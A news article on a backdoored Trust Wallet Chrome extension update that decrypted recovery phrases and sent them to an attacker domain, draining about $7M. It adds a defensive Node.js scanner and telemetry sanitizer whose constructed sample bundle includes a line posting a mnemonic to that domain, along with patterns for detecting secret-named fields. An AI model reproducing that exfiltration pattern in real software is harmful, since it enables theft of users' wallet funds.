- Trust Wallet Chrome extension version 2.68 included malicious code that decrypted users’ mnemonic phrases and sent them to an attacker-controlled server.
- About $7M in Bitcoin, Ethereum and other assets were drained, and users are advised to upgrade the Trust Wallet Chrome extension to version 2.69.
Trust Wallet users who rely on the Chrome browser extension now face a serious security problem. A compromised update drained funds from many wallets and showed how one release can harm a large user base. The update, version 2.68 released around December 24, 2025, contained a hidden backdoor that attackers planted inside the code. They used it to steal about $7 million in cryptocurrency before investigators and the company reacted and pulled the build. The provider, owned by Binance, said that only the Chrome extension suffered from this issue and that mobile applications and other browser builds remain safe for everyday use. According to the Chrome Web Store listing, roughly one million people installed the extension, and Trust Wallet has urged all of them to upgrade to version 2.69, disable the vulnerable build, and ignore unofficial support messages that might exploit the confusion.
How the Trust Wallet browser extension incident unfolded
The incident began like a normal software update. Trust Wallet shipped Chrome extension version 2.68 through the official Web Store without any obvious warning signs. Users installed the release as usual, unlocked their wallets, and in some cases imported recovery phrases, not realising that the extension now contained malicious code that ran in the background whenever they interacted with the interface. Within days, early victims reported that cryptocurrency disappeared soon after they opened the extension, and on-chain investigator ZachXBT linked these reports to the latest release, suggesting that the new code played a direct role in the sudden draining of assets from many accounts.

Security researcher Akinator examined the affected build and found obfuscated logic inside a bundled JavaScript file named 4482.js. The code referenced an external server at api.metrics-trustwallet[.]com, a host outside the normal Trust Wallet environment, which indicated that the extension could be sending sensitive wallet data to infrastructure the attacker controlled. Security and crypto media outlets picked up the findings, and public warnings spread quickly across social networks as more users reported missing funds and unauthorised transfers from wallets that had been used with the compromised extension.

In response, Trust Wallet confirmed a security incident affecting version 2.68 only, told users to disable that specific build, and pushed a patched version 2.69 to the Chrome Web Store that removed the backdoor. The company later issued a detailed notice on X and other channels, stating that it had verified losses of about $7 million so far and promising that all impacted users would receive full refunds once internal checks finished.
Technical breakdown of the malicious Trust Wallet Chrome extension code
Blockchain security firm SlowMist carried out a detailed comparison of Trust Wallet extension version 2.68.0 against the fixed 2.69.0 build and concluded that the attacker had inserted new logic into the extension's internal analytics component. The malicious routine iterated through every wallet stored in the extension and requested the mnemonic phrase for each account, effectively queuing all configured wallets for theft. When the user unlocked the extension, the code reused the same password or passkeyPassword that the legitimate software needs for decryption and used that credential to decrypt each encrypted mnemonic locally. Once it held a mnemonic in plain text, it transmitted the seed words to the attacker-controlled endpoint at api.metrics-trustwallet[.]com, which let the intruder reconstruct each wallet on separate devices and drain funds at will. Because the decryption ran on the victim's own machine with the victim's own unlock credential, a strong password offered no protection: anyone who unlocked or imported a wallet in 2.68 should assume that its phrase was captured.

Investigators followed the infrastructure trail behind the malicious server. The domain metrics-trustwallet[.]com appeared in registration records on December 8, 2025, and the first observed request to the api subdomain surfaced on December 21, a few days before users began to notice missing assets. This timing suggests that the attacker prepared the collection pipeline and tested it ahead of the full campaign.

SlowMist emphasised that the incident did not stem from a compromised third-party dependency, such as a poisoned npm package, but from direct tampering with Trust Wallet's own source: the intruder modified the internal repository and its analytics logic. For exfiltration, the attacker used the legitimate open-source posthog-js analytics library as the transport channel and pointed what looked like normal telemetry traffic at the fake metrics server, so the stolen wallet data travelled mixed in with ordinary usage events. That choice is presumably why the traffic did not stand out: an analytics library posting to a "metrics" hostname is exactly what reviewers and network monitors expect from an extension that already ships telemetry.
Analysts working with the firm said that the level of access needed to alter the internal repository or development environment suggests the attacker may have controlled Trust Wallet developer devices or build pipelines before December 8, and some even raised the possibility of a nation-state operator, although no public evidence has surfaced to support that attribution.
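The following Node.js script is an added example for this article, not code from Trust Wallet, SlowMist or any of the researchers named above. It turns the technical findings into two checks a practitioner would actually run: a static triage of an unpacked extension (manifest version 2.68.x, the metrics-trustwallet[.]com indicator, and any telemetry capture() call whose property list names a secret), and an egress guard for an analytics wrapper that drops any value shaped like a BIP39 phrase before it leaves the process, whatever key it hides under. The only facts taken from the article are the affected version, the attacker domain and the posthog-js capture() transport; the sample bundle, manifest layout, event shapes and all function names are constructed for the demo.

```javascript
// Added example, not Trust Wallet or SlowMist code. Offline triage helpers for
// the 2.68 incident described above. Indicators from the article: affected
// version 2.68.x, attacker domain metrics-trustwallet[.]com, posthog-js
// capture() events carrying decrypted mnemonics. The sample bundle, manifest
// path and telemetry event below are constructed for the demo, not real artifacts.

const IOC_DOMAINS = ["metrics-trustwallet.com"];          // from the article
const AFFECTED_VERSION_PREFIX = "2.68";                    // 2.68.0 was the bad build
const SENSITIVE_KEY = /mnemonic|seed|passkey|password|priv(ate)?key/i;
const BIP39_WORD_COUNTS = new Set([12, 15, 18, 21, 24]);   // valid phrase lengths

function isAffectedVersion(version) {
  return version === AFFECTED_VERSION_PREFIX || version.startsWith(AFFECTED_VERSION_PREFIX + ".");
}

// 1-based line number of a character offset, for reporting.
function lineOf(source, offset) {
  return source.slice(0, offset).split("\n").length;
}

// Static scan of one bundled script. Flags hard-coded IOC domains and any
// telemetry capture('event', { ... }) call whose property list names a secret.
function scanSource(source, fileName = "<inline>") {
  const findings = [];
  for (const domain of IOC_DOMAINS) {
    let idx = source.indexOf(domain);
    while (idx !== -1) {
      findings.push({ kind: "ioc-domain", file: fileName, value: domain, line: lineOf(source, idx) });
      idx = source.indexOf(domain, idx + domain.length);
    }
  }
  const captureRe = /\.capture\s*\(\s*(['"`][^'"`]*['"`])\s*,\s*\{([^}]*)\}/g;
  let m;
  while ((m = captureRe.exec(source)) !== null) {
    if (SENSITIVE_KEY.test(m[2])) {
      findings.push({ kind: "sensitive-telemetry", file: fileName, event: m[1].slice(1, -1), line: lineOf(source, m.index) });
    }
  }
  return findings;
}

// Walk an unpacked extension directory (Node only): manifest version plus a
// scan of every .js file. Run it on a copy of the extension folder, not the live profile.
function triageExtensionDir(dir) {
  const fs = require("fs");
  const path = require("path");
  const files = [];
  (function walk(d) {
    for (const entry of fs.readdirSync(d, { withFileTypes: true })) {
      const p = path.join(d, entry.name);
      if (entry.isDirectory()) walk(p);
      else if (p.endsWith(".js")) files.push(p);
    }
  })(dir);
  const manifest = JSON.parse(fs.readFileSync(path.join(dir, "manifest.json"), "utf8"));
  const findings = files.flatMap((f) => scanSource(fs.readFileSync(f, "utf8"), f));
  return { version: manifest.version, affected: isAffectedVersion(manifest.version), findings };
}

// Egress guard for an analytics wrapper: a value with the shape of a BIP39
// phrase (12-24 lowercase words of 3-8 letters) must never leave the process,
// regardless of the property name it travels under.
function looksLikeMnemonic(value) {
  if (typeof value !== "string") return false;
  const words = value.trim().toLowerCase().split(/\s+/);
  return BIP39_WORD_COUNTS.has(words.length) && words.every((w) => /^[a-z]{3,8}$/.test(w));
}

function sanitizeTelemetryEvent(event) {
  const properties = {};
  const dropped = [];
  for (const [key, value] of Object.entries(event.properties || {})) {
    if (SENSITIVE_KEY.test(key) || looksLikeMnemonic(value)) dropped.push(key);
    else properties[key] = value;
  }
  return { event: event.event, properties, dropped };
}

// Constructed sample bundle mimicking the pattern the article describes
// (not the real 4482.js): line 2 carries the domain, line 4 the capture call.
const SAMPLE_BUNDLE = [
  "// constructed sample, not the real 4482.js",
  "const endpoint = 'https://api.metrics-trustwallet.com/e';",
  "function flush(phrase) {",
  "  posthog.capture('wallet_metrics', { mnemonic: phrase, ver: '2.68.0' });",
  "}",
].join("\n");

function demo() {
  const findings = scanSource(SAMPLE_BUNDLE, "4482.js");
  const guarded = sanitizeTelemetryEvent({
    event: "wallet_unlock",
    properties: {
      screen: "home",
      mnemonic: "abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about",
      note: "legit legit legit legit legit legit legit legit legit legit legit legit",
    },
  });
  return { affected: isAffectedVersion("2.68.0"), findings, guarded };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

For a real check, copy the extension folder out of the Chrome profile and call triageExtensionDir on the copy; a 2.68.x manifest or an ioc-domain hit means the phrase of every wallet unlocked in that build should be treated as compromised. The sanitizer is deliberately shape-based rather than key-based: the article's point is that the stolen phrase travelled under an ordinary analytics call, so a guard that only blocks a property literally named "mnemonic" would not have caught it.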
Tracking the stolen funds
The stolen cryptocurrency currently stands at roughly $7 million in total, based on Trust Wallet statements and independent tracking by analytics groups that monitor movements on public blockchains. Early breakdowns indicate that the intruder drew about $3 million in Bitcoin, around $431 in Solana, and more than $3 million in Ether from compromised wallets, although these numbers will likely change as additional addresses and flows come into focus. On-chain investigator ZachXBT has reported hundreds of victims so far, and other reports describe single accounts losing six-figure sums after years of inactivity, including one long-dormant wallet that held assets worth about $3.5 million and another address that had been inactive for more than two years but still lost roughly $1.4 million.

PeckShield's analysis shows that around $2.8 million of the stolen funds remain in addresses under the attacker's control across Bitcoin, EVM chains, and Solana. More than $4 million has already flowed into centralised services, with about $3.3 million routed through ChangeNOW, approximately $340,000 to FixedFloat, and roughly $447,000 to KuCoin, in what appears to be an effort to swap and launder the proceeds across networks. Other research groups that specialise in anti-money-laundering monitoring have tracked further movements through cross-chain bridges and mixers, which complicates recovery, although exchanges now hold detailed timelines and address lists that can help them freeze residual balances if the attacker attempts to convert more of the stolen assets. Trust Wallet, Binance, and external investigators continue to cooperate with these platforms to follow the funds, identify repeat patterns in the transactions, and look for operational mistakes that might link the on-chain activity to specific infrastructure or identities used during the campaign.
Trust Wallet response, refund pledge, and wider security lessons
Trust Wallet moved quickly to reassure users that it would make victims whole. The team used its official X account, and its statements were later amplified by Binance founder Changpeng Zhao, who said that about $7 million had been affected and confirmed that the wallet provider would cover the losses in full, a message that later updates repeated while the team refined the refund process. The company explained that only users of the Chrome browser extension at version 2.68 were exposed, and that mobile-only customers, as well as those on other extension builds, fell outside the scope of the compromise. It also urged everyone to ignore unsolicited messages that claim to offer support but do not come from its official channels.

In public comments, Trust Wallet stressed that supporting affected users remains its top priority and that it will continue to share guidance on safe migration, including upgrading to version 2.69 and rotating seed phrases where necessary after checking whether a given wallet was ever unlocked or imported in the compromised build. The order of those steps matters: upgrading removes the backdoor from the extension, but it does not recover a phrase that 2.68 already sent to the attacker, so a wallet whose phrase was exposed has to be replaced with a freshly generated one and any remaining balance moved there.

Zhao added that investigators view an insider, or someone with privileged access, as a likely factor in how the malicious code entered the Trust Wallet extension codebase and passed release controls, though he did not present concrete evidence and noted that teams still need time to examine build logs, access trails, and permission records before drawing firm conclusions. For everyday users, the event again highlights how browser extensions that handle private keys remain attractive targets, because even reputable teams can suffer compromises of internal infrastructure. Current best practice therefore still favours keeping larger balances in hardware wallets, checking extension permissions with care, and treating every unexpected prompt for a recovery phrase as a red flag, however familiar the interface appears.
Trust Wallet, for its part, has signalled that it will reinforce internal security reviews for analytics code, tighten deployment pipelines, and work more closely with external auditors and security partners so that similar backdoors find it much harder to pass through release processes in future updates.
Conclusion
The Trust Wallet browser extension breach shows how a single compromised update can undermine years of development work and community trust, yet the decision to reimburse roughly $7 million in losses and the transparent publication of technical details give investigators and the wider ecosystem a clearer view of how the backdoor operated and how similar threats might appear in other projects. Users who upgrade to version 2.69, rotate seed phrases where appropriate, and treat analytics-style permissions with greater caution can reduce exposure in the short term, while long-term resilience will depend on how Trust Wallet and other wallet developers harden their build systems, review processes, and extension release channels against subtle code tampering that targets mnemonic handling and recovery workflows.
Disclaimer
The information provided in this article is for informational purposes only and should not be considered financial advice. The article does not offer sufficient information to make investment decisions, nor does it constitute an offer, recommendation, or solicitation to buy or sell any financial instrument. The content is the opinion of the author and does not reflect any view, suggestion, or advice of any kind from CryptoNewsBytes.com. The author declares that he does not hold any of the above-mentioned tokens and has not received any incentive from any company.